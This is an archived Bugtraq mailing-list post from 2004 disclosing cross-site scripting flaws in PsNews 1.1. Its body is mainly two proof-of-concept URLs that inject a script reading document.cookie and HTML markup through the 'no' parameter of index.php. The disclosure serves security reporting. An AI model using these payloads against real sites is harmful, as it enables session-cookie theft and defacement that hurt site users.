Bugtraq: Bug XSS in PsNews 1.1

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Bug XSS in PsNews 1.1

From: Michal Blaszczak <wacky () nicponie org>
Date: 5 Sep 2004 18:55:24 -0000



°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky () nicponie org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 | 
-----------------------------------------------

Exploit:

a) 
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>

b)
http://[target]/index.php?function=add_kom&no=";>%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/

By Date By Thread

Current thread:

Bug XSS in PsNews 1.1 Michal Blaszczak (Sep 07)
- <Possible follow-ups>
- Bug XSS in PsNews 1.1 Michal Blaszczak (Sep 10)